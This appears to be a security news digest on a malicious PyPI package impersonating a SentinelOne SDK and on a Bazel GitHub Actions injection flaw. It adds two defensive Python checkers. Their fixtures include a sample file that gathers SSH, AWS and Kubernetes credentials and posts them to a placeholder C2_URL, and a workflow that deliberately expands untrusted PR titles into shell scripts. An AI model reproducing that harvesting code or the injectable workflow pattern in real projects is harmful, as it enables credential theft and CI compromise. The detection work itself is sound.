SecurityWeek reports that a malicious PyPI package masquerading as a SentinelOne software development kit is being used in a new supply chain attack aimed at distributing backdoor code for data theft.
ReversingLabs researchers found the malicious code confined to two api.py files; the backdoor exfiltrates shell command execution history and the contents of the SSH folder, including SSH keys and configuration data such as AWS, Git, and Kubernetes credentials. The malware also lists the folders in the root directory and delivers the collected information to the attackers' command-and-control server.
"The malicious code appears designed to siphon sensitive information from development environments. Based on our analysis of the malware and the associated C&C infrastructure, it is unclear if this package was or is being used in active attacks against development environments, due to a lack of evidence found. The download stats suggest that the package has been downloaded more than 1,000 times," said ReversingLabs.
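The harvest-and-exfiltrate combination described above is something a defender can look for statically before a package ever runs. The following is an added example, not code from ReversingLabs, SentinelOne or PyPI: it scores each source file in a package by the sensitive developer paths it references (shell history, `~/.ssh`, AWS, Git and Kubernetes credential files) and the network primitives it calls, and flags files where both appear together. The sample package contents, the `C2_URL` and `API_URL` names and the scoring thresholds are all constructed for the demo.

```python
"""Static triage of Python package sources for credential-harvesting behaviour.

Added example, not ReversingLabs', SentinelOne's or PyPI's code. It flags source
files that combine reads of sensitive developer paths (shell history, ~/.ssh,
cloud and Kubernetes credentials) with an outbound network call, the combination
described for the malicious api.py files. The sample file contents below are
constructed for the demo and do not come from the real package.
"""
import re
from typing import Dict, List

# Paths the report lists as harvested: shell history, SSH keys and config,
# AWS, Git and Kubernetes credentials.
SENSITIVE_PATHS = [
    r"\.bash_history", r"\.zsh_history", r"\.ssh/", r"\.aws/",
    r"\.kube/", r"\.gitconfig", r"\.git-credentials",
]
# Primitives that move data off the host to a command-and-control server.
EXFIL_CALLS = [
    r"requests\.(post|put)\s*\(", r"urllib\.request\.urlopen\s*\(",
    r"socket\.socket\s*\(", r"http\.client\.HTTPS?Connection\s*\(",
]


def scan_source(text: str) -> Dict[str, List[str]]:
    """Return which sensitive-path and exfiltration patterns occur in one file."""
    return {
        "sensitive_paths": [p for p in SENSITIVE_PATHS if re.search(p, text)],
        "exfil_calls": [p for p in EXFIL_CALLS if re.search(p, text)],
    }


def risk_score(found: Dict[str, List[str]]) -> int:
    """One point per indicator, plus a bonus when both categories co-occur.

    A legitimate SDK may POST to its own API; a file that also walks the
    developer's SSH directory and shell history is the suspicious combination.
    """
    score = len(found["sensitive_paths"]) + len(found["exfil_calls"])
    if found["sensitive_paths"] and found["exfil_calls"]:
        score += 5
    return score


def triage_package(files: Dict[str, str], threshold: int = 5) -> List[str]:
    """Return the file names whose score reaches the threshold, sorted."""
    return sorted(name for name, text in files.items()
                  if risk_score(scan_source(text)) >= threshold)


# Constructed sample package (hypothetical): one file carrying the
# harvest-and-exfiltrate pattern, one ordinary API client, one module
# with no network code at all. C2_URL, API_URL and payload are placeholders.
SAMPLE_FILES = {
    "sdk/api.py": (
        "import os, requests\n"
        "HISTORY = os.path.expanduser('~/.bash_history')\n"
        "SSH_DIR = os.path.expanduser('~/.ssh/')\n"
        "AWS_CREDS = os.path.expanduser('~/.aws/credentials')\n"
        "KUBE = os.path.expanduser('~/.kube/config')\n"
        "requests.post(C2_URL, files=payload)  # payload built elsewhere\n"
    ),
    "sdk/client.py": (
        "import requests\n"
        "def send_event(event):\n"
        "    return requests.post(API_URL, json=event)\n"
    ),
    "sdk/version.py": "__version__ = '1.0.0'\n",
}

if __name__ == "__main__":
    for name, text in SAMPLE_FILES.items():
        found = scan_source(text)
        print(f"{name}: score={risk_score(found)} {found}")
    print("flagged:", triage_package(SAMPLE_FILES))
```

The scoring deliberately tolerates a lone `requests.post` (an SDK talking to its vendor's API is normal) and only escalates when the same file also reaches into credential locations; in a real pipeline the file list would come from unpacking the sdist or wheel rather than from an inline dictionary.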
A command injection vulnerability in a GitHub Actions workflow used by Bazel could have allowed threat actors to add malicious code to the production environment of projects that depend on the Google open-source product.
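Command injection in a workflow typically arises when an attacker-controlled event field (a pull request title, a branch name, a comment body) is expanded directly into a `run:` script. The following added example, which is not Bazel's or GitHub's code, is a small stdlib-only checker that pulls every `run:` script out of a workflow file and reports expressions that expand one of those untrusted contexts inline, alongside the accepted mitigation of passing the value through an `env:` variable. The sample workflow, its step names and its line numbers are constructed for the demo.

```python
"""Find untrusted GitHub event data expanded inline in workflow run: scripts.

Added example, not Bazel's or GitHub's code. Stdlib only: run: scripts are
extracted by indentation (plain, | and > block scalars) rather than with a
full YAML parser. The sample workflow below is constructed for the demo.
"""
import re
from typing import List, Tuple

# Event fields whose contents are chosen by whoever opens the PR, issue or
# comment. Expanding them inside a shell script lets that text become code.
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title", "github.event.issue.body",
    "github.event.pull_request.title", "github.event.pull_request.body",
    "github.event.pull_request.head.ref", "github.event.pull_request.head.label",
    "github.event.comment.body", "github.event.review.body",
    "github.event.commits", "github.event.head_commit.message",
    "github.head_ref",
)

EXPR = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def extract_run_scripts(workflow: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, script text) for every run: step."""
    lines = workflow.splitlines()
    scripts = []
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        lineno, value = i + 1, m.group(3).strip()
        if value in ("|", "|-", "|+", ">", ">-", ">+"):
            # Block scalar: the body is every following line indented deeper
            # than the "run" key itself (past any leading "- ").
            base = len(m.group(1)) + len(m.group(2) or "")
            body = []
            i += 1
            while i < len(lines) and (not lines[i].strip() or _indent(lines[i]) > base):
                body.append(lines[i].strip())
                i += 1
            scripts.append((lineno, "\n".join(body)))
            continue
        scripts.append((lineno, value))
        i += 1
    return scripts


def find_injection_risks(workflow: str) -> List[Tuple[int, str]]:
    """Return (line number, expression) for untrusted contexts inside run: scripts."""
    findings = []
    for lineno, script in extract_run_scripts(workflow):
        for expr in EXPR.findall(script):
            if expr.startswith(UNTRUSTED_CONTEXTS):
                findings.append((lineno, expr))
    return findings


# Constructed workflow: two unsafe steps and the two safe forms beside them.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request_target]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Vulnerable, expression expands into the shell script
        run: echo "PR title: ${{ github.event.pull_request.title }}"
      - name: Also vulnerable, multi-line script
        run: |
          BRANCH="${{ github.head_ref }}"
          echo "$BRANCH"
      - name: Safe, value passed through an environment variable
        env:
          TITLE: ${{ github.event.pull_request.title }}
        run: echo "PR title: $TITLE"
      - name: Safe, trusted context
        run: echo "${{ github.sha }}"
"""

if __name__ == "__main__":
    for lineno, expr in find_injection_risks(SAMPLE_WORKFLOW):
        print(f"line {lineno}: untrusted expression ${{{{ {expr} }}}} in run: script")
```

The `env:` form is safe because the runner sets the variable before the shell starts, so the value is data to the script rather than part of its text; the checker therefore only inspects `run:` values, not `env:` blocks, and treats `github.sha` as trusted. Prefix matching on `github.event.commits` also catches indexed forms such as `github.event.commits[0].message`.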